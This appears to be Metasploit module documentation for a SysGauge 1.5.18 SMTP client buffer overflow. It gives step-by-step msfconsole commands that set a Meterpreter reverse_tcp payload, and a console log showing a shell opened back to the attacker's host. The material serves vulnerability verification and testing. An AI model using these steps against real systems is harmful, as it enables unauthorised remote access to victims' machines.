CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Vulnerable Application

This module will setup an SMTP server expecting a connection from SysGauge 1.5.18 via its SMTP server validation. The module sends a malicious response along in the 220 service ready response and exploits the client, resulting in an unprivileged shell.

The software is available for download from SysGauge.

Verification Steps

1. Install the application

2. Start msfconsole

3. Do: use exploit/windows/smtp/sysgauge_client_bof

4. Do: set payload windows/meterpreter/reverse_tcp

5. Do: set LHOST ip

6. Do: run

7. The user should put your SRVHOST or other applicable IP address in the SMTP configuration in the program, and hit the "Verify Email ..." button.

8. You should get a shell.

Scenarios

Here is how to typically execute the module. Note that the client must input this SMTP server information under SysGauge Options and hit the "Verify Email ..." button.

msf > use exploit/windows/smtp/sysgauge_client_bof
msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(sysgauge_client_bof) > exploit
[*] Exploit running as background job.
msf exploit(sysgauge_client_bof) >
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Server started.
[*] Client connected: 10.0.0.128
[*] Sending payload...
[*] Sending stage (957487 bytes) to 10.0.0.128
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500